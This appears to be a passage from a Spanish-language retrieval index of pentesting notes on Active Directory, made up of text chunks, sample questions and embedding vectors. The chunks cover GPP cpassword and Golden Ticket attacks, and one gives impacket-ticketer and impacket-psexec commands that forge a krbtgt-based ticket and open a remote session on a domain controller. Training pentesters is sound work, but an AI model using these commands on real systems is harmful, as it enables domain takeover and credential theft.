0.05481, 0.14087, -0.07139, -0.07196, -0.01849, 0.01766, 0.05325, -0.06267, 0.02149, 0.06448, -0.00345, 0.00644, -0.05716, -0.07326, -0.02484, 0.00171, -0.00491, 0.03498, 0.07108, -0.01402, -0.03062, 0.01202, -0.07147, -0.07892, 0.08405, -0.04934, 0.04793, -0.04935, -0.06346, -0.03857, -0.00524, -0.01699, -0.03521, -0.01433, -0.08016, 0.01765, -0.08428, -0.04916, 0.0077, 0.04462, -0.03121, -0.05861, -0.00292, -0.01187, -0.10548, -0.00163, -0.05727, 0.055, -0.01357, 0.01131, -0.04356, 0.04265, 0.02493, 0.03802, 0.00655, -0.00023, -0.02013, -0.09819, 0.05264, -0.03546, 0.00707, -0.02348, -0.0631, 0.02153, -0.03288, 0.05637, 0.03988, 0.00035, -0.0485, 0.02207, 0.02114, -0.03065, -0.08943, -0.03578, 0.0029, 0.04104, -0.01063, 0.02761, -0.01017, -0.03548, 0.01365, -0.021, -0.01176, -0.0317, -0.01984, 0.049, 0.01069, 0.03423, 0.01374, -0.04336, 0.02693, 0.01988, 0.06003, -0.00261, 0.02059, -0.00309, -0.0032, 0.01208, 0.03343, 0.04222, 0.04318, -0.02921, -0.02233, -0.05011, -0.08434, 0.06416, 0.02522, 0.00272, -0.01178, 0.00501, 0.03116, -0.11032, 0.01695, -0.00344, -0.04547, -0.02297, 0.0142, 0.0212, 0.01755, 0.03419, -0.07164]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nCredenciales en claro β†’ Movimiento lateral / Pass-the-Hash.\n\nRelacionado: SMB Β· OSCP MOC", "indexar": "con que puedo montar un ataque de movimiento lateral?", "v": [0.0013, 0.09677, -0.21475, -0.14762, -0.33199, 0.07306, -0.05906, 0.17198, -0.0985, 0.00269, 0.02462, -0.05206, 0.05488, 0.04991, 0.08903, 0.03532, 0.0675, -0.00482, -0.00254, -0.08774, -0.0629, -0.06257, 0.07918, -0.079, 0.08602, 0.09796, -0.01838, 0.03679, -0.07136, -0.09951, -0.06138, 0.05889, 0.079, 0.02366, 0.09326, -0.14065, 0.0011, 0.03134, 0.07526, 0.03158, -0.12732, -0.07512, -0.15615, -0.02427, -0.01942, 0.00947, -0.01126, -0.00715, -0.00756, 0.0012, 0.17426, 0.12271, -0.06989, -0.08464, -0.0609, -0.04457, 0.12818, -0.04333, 0.0447, -0.05633, 0.03607, 0.14164, -0.04234, -0.01868, 0.03539, -0.06849, -0.01351, -0.02786, -0.09887, -0.07406, 0.00234, -0.02308, -0.08679, 0.07957, -0.03701, 0.10275, 0.06616, 0.02765, 0.00504, 0.07178, -0.01738, 0.06665, -0.0662, 0.03826, -0.05882, -0.06573, 0.00118, -0.11013, 0.01548, 0.0497, 0.09451, 0.03431, -0.07679, -0.01788, -0.09607, 0.01378, -0.09937, -0.00582, -0.04517, -0.04009, -0.01098, 0.00063, -0.0849, 0.02541, 0.12124, -0.07996, 0.02583, -0.03046, 0.04346, -0.04656, 0.02694, -0.02093, -0.09318, -0.0187, -0.01232, -0.05251, -0.17388, 0.04932, -0.05222, 0.07888, 0.01274, 0.00066, -0.02398, -0.03041, -0.04965, -0.03966, 0.02119, 0.01505, -0.12819, 0.01497, 0.0576, -0.00371, 0.03834, -0.05536, -0.05226, 0.03313, 0.04288, 0.0127, 0.03581, 0.02811, 0.057, 0.01945, -0.0032, -0.03154, 0.00022, 0.06824, 0.04426, -0.00969, -0.06959, 0.05263, -0.00333, 0.05441, 0.06683, 0.02434, -0.03936, 0.0058, -0.01308, -0.01051, -0.04296, 0.08268, 0.00513, 0.12031, -0.09099, 0.00255, -0.03002, -0.06548, -0.02133, -0.02029, 0.0775, 0.01925, -0.02184, 0.02316, 0.01872, 0.00342, 0.0558, 0.01731, -0.06944, -0.01275, 0.07758, 0.03034, 0.00244, 0.00305, -0.03194, 0.00441, 0.02605, -0.01532, 0.07063, 0.02919, 0.04743, 0.08795, -0.02319, 0.01958, -0.00409, 0.01378, 0.01171, -0.08429, -0.04638, 0.03284, 0.04822, 0.0364, -0.03406, -0.0383, 0.01052, 0.01797, 0.05769, 0.04975, -0.03514, 0.06647, 0.02911, 0.01616, 0.02197, -0.04606, 0.10755, -0.01459, -0.07951, 0.01106, 0.01041, -0.00669, -0.04404, 0.03739, 0.03812, 0.00346, 0.06175, 0.03337, 0.01352, -0.03707, -0.01042, -0.02193, 0.00271, 0.0264, 0.01092, 0.00848, 0.01034, -0.05127, 0.01816, 0.00118, 0.09206, 0.01425, -0.0893, 0.02365, -0.00061, -0.00835, -0.02353, -0.01159, -0.01909, -0.06271, -0.04441, 0.06298, 0.01202, -0.04923, 0.02316, 0.01129, -0.01209, -0.0489, 0.0606, 0.00787]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Golden Ticket\n\n> Con el hash de **krbtgt** forjas tu propio TGT β†’ eres **cualquiera** (incluso un Domain Admin inexistente), para siempre. Cima de Active Directory.", "indexar": "que programa hay para forjarme mi propio ticket Kerberos sin el hash real?", "v": [-0.09987, -0.11675, -0.03941, -0.03762, 0.06589, -0.15706, -0.04847, 0.1181, -0.00218, -0.02811, -0.00193, 0.02953, 0.06423, -0.07869, 0.16906, 0.11803, -0.00215, -0.04719, 0.1604, 0.08039, 0.07209, 0.11554, -0.04871, -0.0269, -0.06701, 0.00103, 0.0485, 0.04797, -0.16741, -0.03276, 0.02394, -0.01821, 0.00731, -0.13804, 0.01665, 0.01168, 0.06609, 0.15092, 0.01151, 0.0115, 0.1057, 0.02614, 0.07617, 0.22263, -0.04475, -0.09317, 0.04682, -0.03126, -0.02931, -0.14191, 0.04373, -0.01172, -0.07095, 0.06818, 0.06817, -0.20212, -0.04616, -0.07083, -0.10044, -0.03836, -0.08464, -0.10102, -0.005, -0.03574, 0.0197, -0.05089, 0.14191, 0.00313, -0.00937, -0.05422, -0.12301, 0.05448, 0.07489, 0.06566, 0.00449, 0.07204, 0.03004, -0.05583, 0.06001, -0.03008, 0.05164, -0.05212, 0.11083, 0.14439, 0.01052, -0.04725, 0.0745, -0.07425, 0.01137, 0.08617, -0.02839, 0.13463, 0.05098, 0.0202, 0.016, -0.13218, 0.04788, -0.01751, -0.04375, 0.03563, -0.06395, -0.0834, -0.08629, 0.0366, -0.0538, 0.05937, 0.06798, -0.00344, -0.03426, 0.09736, 0.02525, 0.00519, -0.05335, -0.02258, -0.06312, 0.05206, 0.03326, -0.01016, 0.05457, -0.00603, -0.08532, 0.02718, 0.03874, -0.13509, 0.06447, -0.02471, -0.095, 0.09715, 0.03587, 0.03185, 0.02302, 0.10277, -0.06415, -0.05489, -0.04054, -0.03725, -0.0645, -0.0179, 0.03142, 0.03653, 0.03798, 0.10523, -0.02636, -0.05334, 0.00696, -0.02716, -0.08057, 0.02148, -0.02745, -0.01128, 0.01661, -0.00602, 0.05616, 0.07039, -0.01812, 0.02365, 0.0261, -0.02198, -0.08228, 0.01954, -0.04205, -0.01104, -0.0385, -0.01183, 0.06403, 0.00731, -0.02431, 0.01816, 0.07265, 0.15189, -0.02819, 0.04232, 0.08844, 0.00554, 0.00895, -0.03257, 0.01599, -0.04578, 0.00744, -0.05612, 0.0257, -0.04854, 0.09443, -0.01573, -0.01916, 0.01018, -0.01056, 0.04516, 0.05099, -0.03048, 0.03027, -0.02552, -0.01202, 0.07339, -0.06337, 0.02711, -0.01582, -0.04777, 0.03435, -0.04971, -0.04801, 0.00201, 0.0612, 0.00808, 0.07889, 0.07432, -0.03193, -0.0441, 0.06797, 0.08951, 0.01434, -0.03442, 0.03813, 0.01693, -0.02641, -0.02691, 0.04504, 0.01739, 0.04027, 0.0269, 0.03759, 0.03275, 0.0218, 0.00124, -0.03527, -0.0626, -0.00539, 0.03945, 0.03386, 0.02116, 0.00211, -0.02178, 0.00078, 0.01365, 0.00958, -0.0244, 0.02686, 0.01713, -0.04952, -0.078, 0.00445, 0.06079, 0.02527, -0.04399, -0.04477, 0.00326, -0.05617, -0.01974, 0.02482, 0.07369, -0.0382, 0.00736, 0.03212, -0.06807, 0.02751, -0.02565]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Golden Ticket\n\n> Con el hash de **krbtgt** forjas tu propio TGT β†’ eres **cualquiera** (incluso un Domain Admin inexistente), para siempre. Cima de Active Directory.", "indexar": "con que puedo montar una sesiΓ³n como cualquier usuario aunque no tenga cuenta?", "v": [-0.09921, 0.18229, -0.22425, -0.0385, -0.14206, -0.04128, -0.107, -0.00353, -0.11129, -0.17874, -0.1635, 0.02385, 0.06237, -0.00406, 0.02111, 0.04174, 0.04887, -0.01022, 0.10576, 0.01831, 0.01758, -0.08748, 0.03069, -0.00791, 0.02801, 0.0282, 0.16736, -0.10151, -0.02449, -0.0188, 0.03977, 0.0187, 0.04935, -0.04676, 0.00087, -0.12396, 0.01646, 0.01023, -0.01154, 0.04414, 0.02086, 0.03358, -0.09821, 0.11344, 0.05865, 0.06223, -0.0322, -0.00092, -0.05622, 0.03163, 0.11802, -0.02226, -0.10285, 0.03888, -0.08506, -0.03699, 0.1929, -0.0959, 0.09507, -0.05896, 0.00298, 0.11977, 0.01712, 0.11527, 0.00535, -0.01113, 0.0498, 0.01606, -0.02775, 0.01968, -0.12367, -0.0933, -0.10033, -0.05529, 0.13492, 0.01261, 0.01703, -0.0311, 0.04076, 0.01519, -0.03141, -0.09762, 0.00544, 0.01769, -0.17737, -0.02855, 0.0704, -0.05394, 0.04833, -0.0168, 0.07127, 0.00412, -0.0024, -0.06799, -0.00281, -0.05279, 0.01892, 0.08887, 0.02259, -0.01038, 0.00197, 0.08742, -0.01904, 0.1268, 0.0141, -0.04465, 0.05974, -0.08853, 0.03303, -0.08436, 0.03108, 0.02654, -0.14801, -0.07267, -0.06044, -0.00824, -0.07571, -0.04963, -0.03185, 0.03189, -0.06215, 0.0154, 0.06026, -0.00711, 0.00698, -0.02989, 0.03429, 0.09621, -0.06401, -0.0161, -0.06293, 0.00353, -0.02624, -0.00514, -0.00635, 0.07142, -0.05873, -0.05182, -0.0844, -0.01365, 0.05678, 0.07564, 0.00973, -0.11286, 0.05774, -0.0305, 0.00693, -0.11432, -0.03755, 0.02096, 0.05549, 0.01803, 0.03693, 0.06768, -0.0647, 0.05136, 0.02223, -0.05926, 0.08093, 0.1017, 0.00907, 0.05697, 0.02761, -0.00582, -0.01971, -0.05796, -0.10357, -0.02414, 0.05616, 0.01097, -0.07676, 0.06714, -0.0009, -0.02305, 0.0533, -0.04252, -0.07946, -0.02591, 0.05734, -0.01758, -0.06406, -0.02927, -0.03955, -0.03004, -0.06484, -0.03761, 0.01348, 0.02564, 0.047, 0.04079, 0.01447, 0.093, -0.04659, -0.00128, -0.01159, -0.08721, -0.02653, 0.02703, 0.02035, -0.0286, -0.00605, 0.01959, -0.03526, 0.00631, 0.02045, -0.02816, -0.0555, 0.05784, 0.02898, -0.00936, 0.03741, -0.04609, 0.05597, -0.08675, -0.00459, -0.0026, 0.04441, -0.04626, -0.04111, 0.01293, 0.01567, 0.05759, 0.08092, 0.0097, 0.03101, 0.0123, 0.04248, -0.03455, 0.02522, 0.05751, -0.03002, 0.04555, -0.04046, -0.03143, 0.05854, 0.03304, 0.05081, 0.01096, -0.04469, -0.01037, 0.00524, 0.07662, 0.02528, -0.03878, 0.01615, -0.02617, -0.0941, 0.05002, -0.03326, -0.10065, -0.03227, 0.06422, 0.07167, -0.03671, -0.00271, -0.03718]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Golden Ticket\n\n> Con el hash de **krbtgt** forjas tu propio TGT β†’ eres **cualquiera** (incluso un Domain Admin inexistente), para siempre. Cima de Active Directory.", "indexar": "cual es una alternativa libre a golden ticket?", "v": [-0.09795, -0.01982, -0.0651, 0.04229, -0.10656, -0.0037, -0.06928, -0.01166, -0.09346, -0.00726, -0.06293, -0.1702, -0.05946, 0.15015, 0.09296, -0.03925, 0.05446, -0.04038, 0.23042, -0.0124, -0.04728, 0.04636, -0.01051, -0.1859, 0.03729, -0.10351, 0.04527, 0.06624, -0.0615, -0.00181, 0.09518, -0.13209, -0.04109, -0.11491, -0.02283, 0.0162, 0.17077, 0.17825, 0.06168, -0.12602, -0.00094, -0.09511, 0.00563, 0.11778, 0.0284, -0.14023, -0.03335, 0.14096, -0.06667, -0.03815, -0.03957, -0.01587, -0.02894, 0.04448, 0.08616, -0.05645, 0.05914, -0.08782, -0.11422, 0.01816, -0.06067, -0.05995, -0.01545, -0.00923, -0.0697, 0.15084, 0.0183, 0.01164, 0.02256, -0.02034, 0.00785, -0.03754, 0.02069, 0.07774, -0.05765, 0.05813, 0.03127, -0.00554, -0.02687, 0.05838, 0.05602, -0.03517, 0.02324, 0.03548, 0.07923, -0.09029, 0.1042, -0.07942, -0.04296, 0.08482, 0.04258, 0.02424, 0.04029, 0.05317, -0.04585, -0.14266, -0.05641, 0.02477, -0.03291, 0.06997, 0.05729, 0.02395, -0.11975, -0.02956, 0.00826, 0.02382, 0.00021, 0.01614, -0.10101, 0.01704, -0.08119, 0.05485, -0.04264, 0.02168, -0.02408, -0.00779, 0.02831, 0.04816, 0.03213, 0.01082, 0.02307, -0.02378, -0.04305, -0.10528, 0.06979, 0.04317, 0.02088, 0.06636, 0.02922, 0.06581, 0.05662, 0.04748, -0.07914, -0.07067, -0.11038, -0.02698, 0.03076, -0.02884, 0.1, 0.07078, 0.0387, -0.01933, 0.03387, -0.04607, 0.06154, -0.07389, -0.01575, -0.05536, -0.03313, -0.03024, -0.08159, -0.02421, 0.00241, 0.18953, -0.04644, 0.04873, -0.00985, -0.01368, -0.08664, 0.04191, 0.01801, -0.0096, 0.01134, 0.06088, -0.00175, 0.02892, -0.03131, -0.03323, -0.07461, 0.00597, 0.01655, 0.04166, 0.11965, -0.02341, 0.02743, -0.09596, -0.04157, -0.06536, 0.05475, -0.04555, 0.09469, 0.01075, -0.081, 0.02384, -0.00641, -0.04677, 0.01716, -0.02498, 0.04891, 0.03085, -0.02619, 0.00664, -0.04792, -0.01193, -0.06746, -0.02784, -0.04411, -0.1006, -0.03979, -0.04594, -0.04584, 0.00656, -0.02456, -0.01776, 0.03429, 0.00275, -0.01518, 0.01649, 0.01578, 0.09406, 0.05177, -0.01683, 0.11786, 0.0143, -0.03648, -0.04009, 0.0302, -0.02454, -0.05352, -0.02547, 0.10733, 0.02922, 0.01817, -0.0046, -0.00236, -0.00132, 0.03169, 0.06482, 0.03726, 0.01773, 0.052, 0.02606, -0.0204, 0.05197, 0.05809, 0.01654, 0.02634, -0.00863, -0.07099, 0.00593, 0.0558, 0.09335, -0.01671, 0.02995, -0.00882, 0.03652, -0.06606, -0.00915, 0.00058, -0.03322, -0.01797, 0.02462, 0.00035, -0.01537, -0.00475, -0.02329]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nHash NTLM de la cuenta **krbtgt** β†’ se obtiene con DCSync o secretsdump sobre el DC.", "indexar": "cΓ³mo puedo obtener el hash NTLM de la cuenta krbtgt?", "v": [-0.05207, -0.04991, 0.04136, 0.01592, 0.0982, -0.14776, -0.05543, 0.26953, -0.16559, 0.06704, -0.15702, -0.02971, 0.11963, 0.05704, 0.00441, 0.10741, -0.14147, -0.04544, -0.05349, 0.03786, -0.01893, -0.14909, -0.09282, 0.03516, -0.045, -0.04841, -0.00639, 0.08809, -0.16443, 0.10839, -0.0368, -0.11357, -0.14329, 0.12236, 0.02514, -0.01046, 0.02425, 0.12025, -0.01404, 0.09304, 0.08919, 0.02044, 0.03076, 0.14628, 0.12702, -0.12603, -0.1237, -0.04254, 0.00914, -0.10577, -0.06526, 0.08925, -0.20148, -0.12683, -0.07955, -0.01464, 0.04846, -0.0598, 0.00111, -0.00935, 0.0007, -0.05167, -0.0115, -0.08252, -0.05818, -0.09043, -0.00891, -0.0071, -0.0541, -0.01004, -0.14513, 0.06676, -0.04655, -0.07956, -0.00704, 0.06717, -0.01177, 0.00464, 0.06613, 0.03127, 0.03977, -0.11538, -0.03758, -0.06183, -0.13978, -0.11507, 0.07849, -0.0647, 0.02213, -0.03965, 0.05297, 0.05408, 0.02752, 0.04307, 0.02842, -0.0607, 0.01711, 0.00853, 0.0015, 0.02299, -0.02723, 0.00678, -0.04699, 0.11719, -0.06122, -0.00506, 0.10003, -0.00521, 0.02838, 0.00121, 0.03694, -0.00983, -0.13886, -0.05052, -0.03388, 0.03326, -0.06026, -0.06947, 0.03666, -0.01543, -0.06441, -0.00837, 0.0534, 0.03485, 0.07613, -0.05348, -0.06754, 0.07127, -0.02751, 0.02091, -0.00219, 0.00134, 0.03004, 0.00033, 0.02982, -0.04472, -0.04628, 0.02738, -0.04903, -0.07884, 0.00719, 0.0334, -0.01138, -0.13978, 0.01456, -0.032, -0.01493, -0.10232, 0.03257, -0.03284, 0.03875, 0.00576, -0.01401, 0.00986, 0.00756, -0.0409, -0.00411, -0.03575, -0.03805, 0.04573, 0.04135, 0.0238, 0.00121, 0.05354, 0.00888, -0.02589, 0.00672, -0.02649, 0.05064, -0.04111, -0.0017, 0.02604, 0.00337, -0.00546, 0.02568, -0.04606, 0.01141, -0.0201, -0.02779, -0.06369, -0.02106, 0.06845, -0.01344, -0.06421, 0.01905, -0.03128, 0.04648, 0.00521, 0.02406, 0.02451, -0.03674, 0.04547, -0.06598, 0.00704, -0.02052, -0.03239, 0.01505, -0.02101, 0.05015, -0.03854, -0.03517, 0.03033, 0.02053, -0.07576, -0.00175, -0.00837, -0.03445, 0.06043, -0.06472, -0.01045, 0.08585, -0.0575, 0.07977, -0.07294, -0.06667, 0.0071, -0.01241, -0.06872, 0.00155, 0.03131, -0.01012, 0.03478, 0.02411, -0.00772, 0.01125, -0.06324, 0.02984, 0.00022, 0.00091, 0.05217, -0.05398, 0.03236, -0.01314, -0.00504, 0.05752, 0.04943, -0.02252, 0.01526, -0.01766, -0.03847, 0.05712, 0.04271, -0.01733, 0.00162, 0.00421, -0.04435, -0.07636, 0.03032, 0.01066, -0.04498, 0.01248, -0.04189, 0.04238, 0.01981, -0.00488, -0.03047]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nHash NTLM de la cuenta **krbtgt** β†’ se obtiene con DCSync o secretsdump sobre el DC.", "indexar": "quΓ© herramienta me sirve para extraer credenciales del controlador de dominio?", "v": [0.07634, -0.00462, -0.1094, -0.12484, 0.07663, -0.09724, 0.05147, 0.02076, -0.05285, -0.10857, -0.05154, -0.03886, -0.00633, -0.27049, 0.05686, 0.00671, 0.19592, -0.14037, -0.02546, 0.0069, -0.00849, -0.081, -0.03743, -0.11635, -0.04685, -0.00996, -0.04472, -0.02487, -0.12161, 0.11706, 0.01693, 0.03203, 0.03478, -0.02354, -0.05181, -0.053, -0.08916, 0.07659, 0.00948, 0.17433, 0.01612, -0.00652, -0.06671, 0.006, -0.01019, 0.01356, 0.0212, -0.0309, -0.00408, 0.02806, -0.06335, -0.15289, -0.10353, 0.02333, 0.02456, -0.07186, 0.12499, -0.13583, 0.09363, -0.14225, -0.07807, -0.09949, 0.06085, 0.01454, -0.15062, -0.04669, -0.00839, -0.08486, -0.10044, 0.05417, -0.08008, 0.01453, 0.119, 0.03229, -0.00631, -0.08753, 0.06535, 0.05488, 0.13138, -0.06267, 0.10672, -0.04193, -0.07857, -0.06597, 0.00222, -0.07274, -0.08319, -0.15923, -0.03278, 0.005, 0.00462, 0.03449, -0.04862, -0.04202, -0.0304, -0.00431, 0.0178, 0.00557, -0.0655, -0.04119, 0.18086, 0.02471, -0.11799, 0.13687, 0.06553, 0.10567, 0.04784, -0.06556, -0.07641, -0.01574, 0.042, 0.02072, -0.04039, -0.00102, -0.05718, 0.10717, -0.05114, -0.03045, 0.01463, -0.07847, 0.00738, -0.06615, 0.08481, -0.06208, 0.01617, 0.03071, -0.03883, 0.08116, 0.01799, -0.17639, -0.03806, -0.08128, 0.00367, -9e-05, 0.01496, 0.02792, 0.00371, -0.09947, -0.0474, 0.0118, -0.0351, 0.01244, -0.029, -0.06391, 0.03446, -0.07473, 0.03905, -0.03208, 0.01482, -0.06872, -0.0095, -0.00837, 0.0101, 0.05138, -0.0062, -0.00747, -0.02093, 0.02971, -0.07097, 0.07467, -0.07838, -0.07499, 0.01046, 0.0346, 0.00822, -0.03068, 0.01644, -0.03802, 0.0238, 0.09394, 0.01995, 0.02478, 0.03438, -0.03817, -0.00592, -0.06162, 0.00573, -0.03373, -0.02064, -0.09171, -0.01165, 0.02803, -0.00019, 0.03795, -0.03152, 0.03306, 0.01904, -0.00421, -0.02375, 0.05474, 0.0407, 0.03833, -0.01122, -0.07497, 0.04156, 0.02304, 0.05343, -0.04059, -0.00237, -0.00194, -0.03461, -0.00841, 0.00208, -0.0397, 0.01452, 0.0769, 0.01872, 0.00892, 0.02475, 0.00522, 0.01797, -0.00127, 0.03455, -0.00466, -0.03499, 0.0073, -0.00179, 0.01103, -0.0153, -0.09103, 0.03214, -0.00565, 0.04029, 0.03269, -0.01503, 0.00539, -0.00466, 0.00186, -0.00163, 0.0355, 0.0308, -0.01831, -0.01613, -0.04182, 0.00043, -0.04412, 0.0521, -0.01815, 0.00263, -0.03423, -0.06335, 0.03761, -0.00411, -0.07614, -0.08721, -0.07146, -0.03883, -0.01087, -0.03313, -0.04587, 0.01462, 0.00509, 0.05876, -0.04636, -0.0154, 0.00178]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nHash NTLM de la cuenta **krbtgt** β†’ se obtiene con DCSync o secretsdump sobre el DC.", "indexar": "con quΓ© programa consigo los secretos de un DC usando DCSync?", "v": [-0.0955, 0.00227, -0.14556, -0.07083, 0.00061, -0.16984, -0.14358, -0.00537, -0.02323, 0.13802, 0.01733, -0.12203, -0.23109, -0.28657, -0.10529, -0.1173, 0.14704, 0.01739, -0.05573, -0.10644, 0.09688, -0.15013, 0.01229, -0.13762, 0.1109, -0.01755, 0.01645, 0.05315, -0.03471, 0.01296, 0.11544, -0.00558, 0.13709, -0.00855, 0.02232, -0.02814, -0.03647, 0.00623, 0.12565, -0.00416, -0.00073, -0.05664, -0.1424, 0.0739, 0.00853, 0.0028, 0.07888, -0.05872, -0.02676, -0.15438, -0.1235, 0.02058, -0.10071, 0.06623, -0.00945, -0.07038, -0.11004, 0.08436, 0.0611, -0.03909, -0.01801, 0.04037, 0.01093, 0.05726, -0.0059, 0.03473, -0.02857, -0.06802, -0.08556, 0.03468, -0.00546, 0.05856, 0.07638, -0.03776, 0.11315, 0.03091, 0.00872, -0.10833, 0.04261, -0.03312, 0.0009, 0.06445, -0.00316, 0.03906, -0.05305, 0.02108, 0.11882, -0.00776, -0.07496, -0.06771, 0.11211, 0.03656, -0.07787, 0.08679, 0.11469, -0.01104, 0.07635, 0.01093, 0.04426, 0.03079, 0.0841, -0.01782, -0.0518, 0.12789, -0.08087, 0.05658, 0.08419, -0.04353, -0.01633, 0.06162, -0.01174, 0.13112, -0.02666, -0.0274, -0.04009, 0.03447, 0.0183, -0.04122, 0.00706, -0.05441, -0.14749, 0.03477, -0.08222, -0.00305, 0.08503, 0.03993, 0.00546, 0.07228, -0.05385, 0.02011, 0.01612, -0.07071, 0.01375, -0.00529, 0.03777, -0.02979, -0.00223, 0.01938, -0.0652, -0.0191, 0.05412, 0.00764, 0.03637, 0.06812, 0.06026, -0.01642, 0.0383, -0.0236, -0.03017, 0.00623, 0.04486, -0.00212, 0.00859, -0.02213, -0.05125, -0.01876, -0.00636, -0.02341, -0.05339, 0.02635, -0.05959, 0.06867, -0.00608, -0.06617, -0.00655, -0.09281, 0.02716, -0.01669, 0.02777, 0.10812, -0.02959, 0.02425, 0.03695, -0.04008, -0.04624, 0.02234, 0.04328, -0.05613, 0.05191, -0.01133, -0.02495, 0.06308, 0.06059, 0.02575, -0.05586, -0.04018, -0.01856, -0.01644, 0.01992, -0.03415, -0.04319, -0.02867, 0.05709, -0.03782, 0.01829, -0.02601, -0.02317, -0.01423, 0.04752, -0.05471, 0.00552, 0.00854, 0.00964, 0.00761, 0.08614, 0.03872, -0.00503, 0.05015, 0.0153, 0.06101, 0.08615, -0.02663, 0.04609, -0.00878, 0.012, 0.0182, -0.03443, 0.03121, 0.01022, 0.03709, -0.01042, -0.01631, 0.00774, -4e-05, 0.02993, -0.0662, 0.02379, 0.02176, 0.02315, 0.0778, 0.00046, 0.04533, -0.04756, -0.01202, 0.02003, 0.02571, -0.03515, 0.01647, 0.00523, -0.03392, 0.00595, 0.03394, -0.02355, -0.02337, -0.00788, 0.01924, -0.00801, 0.03583, 0.0209, -0.02079, -0.00083, -0.02096, 0.00715, -0.00314, -0.01477, -0.02518]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local\n```\n```", "indexar": "que herramienta sirve para obtener acceso remoto a una mΓ‘quina con un hash de KRBTGT?", "v": [0.01873, -0.08983, -0.11853, -0.18261, 0.02486, -0.16476, -0.13824, 0.09803, 0.03245, 0.01531, -0.14693, -0.04571, 0.0756, 0.01566, 0.18447, 0.08722, -0.04721, -0.03437, -0.11811, 0.07146, 0.04594, -0.00826, 0.01397, 0.02414, -0.0923, 0.00581, 0.07757, 0.12228, -0.23717, 0.08725, 0.06614, -0.01767, -0.10693, 0.00345, -0.07341, -0.15741, -0.02682, 0.18833, 0.07444, 0.07695, 0.07658, -0.00781, -0.07438, 0.12022, 0.09904, -0.02027, 0.04838, 0.01863, -0.00081, 0.07744, -0.01731, -0.11454, -0.15524, 0.02962, -0.01753, -0.10246, 0.17, -0.10658, -0.07944, -0.08629, -0.1134, -0.05917, -0.0762, -0.06726, -0.06684, -0.10756, 0.02714, -0.02797, -0.12562, 0.03918, -0.12903, -0.04867, 0.05436, -0.0149, -0.00156, 0.03051, -0.04574, 0.05341, 0.07398, 0.00549, -0.03078, -0.04724, -0.05974, -0.03891, -0.15964, -0.10243, 0.16592, -0.00573, 0.05509, -0.109, -0.01926, 0.10241, 0.0247, -0.05099, 0.06113, 0.00431, 0.03355, -0.09567, -0.03878, -0.04114, 0.07685, -0.03613, -0.04829, 0.06849, -0.05774, 0.01357, 0.04572, -0.0204, -0.0005, -0.02859, 0.07879, 0.02322, -0.01634, 0.02452, -0.05682, 0.01439, -0.03782, -0.02859, -0.03346, -0.00571, 0.00176, 0.04773, 0.03643, -0.04507, 0.00708, -0.04611, -0.03134, 0.04306, -0.041, -0.06601, 0.03761, 0.04329, -0.07048, -0.00953, 0.00707, 0.00811, 0.02876, -0.10571, -0.04361, -0.09062, 0.03029, 0.06987, -0.05032, -0.0832, 0.01336, -0.01799, 0.05844, -0.02597, 0.0214, -0.02251, 0.07456, -0.06567, 0.02072, -0.01958, -0.07245, 0.00445, -0.0707, -0.00448, -0.11572, 0.04064, -0.06755, -0.04017, 0.00829, 0.00993, 0.00568, -0.00497, 0.03854, -0.0357, 0.05848, 0.02886, -0.04604, 0.01727, 0.06015, 0.01504, -0.03145, -0.03046, -0.02134, 0.02325, 0.00015, -0.07472, -0.01668, -0.02338, -0.03088, -0.06504, 0.03684, 0.01971, 0.01441, -0.01596, 0.03207, -0.03128, 0.01582, 0.02348, -0.05643, -0.00919, 0.05103, 0.03065, -0.03765, 0.00191, 0.06761, 0.00276, -0.05167, -0.00617, 0.00719, -0.0405, 0.03992, 0.0341, -0.02571, -0.01642, -0.05664, 0.02876, 0.04297, 0.01723, -0.00237, -0.02499, -0.01067, -0.02103, -0.03224, -0.00762, -0.02168, -0.00895, 0.01295, -0.00688, -0.00083, 0.02163, 0.00172, 0.01779, 0.04421, 0.03437, 0.04205, -0.04629, 0.01631, -0.01582, 0.00098, -0.0043, 0.01661, -0.04643, 0.01827, -0.01893, -0.03348, -0.04934, -0.00885, 0.02941, 0.02266, -0.0292, -0.017, -0.06462, -0.02777, -0.0241, -0.05208, -0.0476, -0.04658, -0.01612, 0.0353, 0.00609, -0.01387, 0.0139]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local\n```\n```", "indexar": "cual es un programa para ejecutar comandos en dominios Active Directory usando credenciales robadas?", "v": [0.04052, -0.02612, -0.05548, -0.10402, 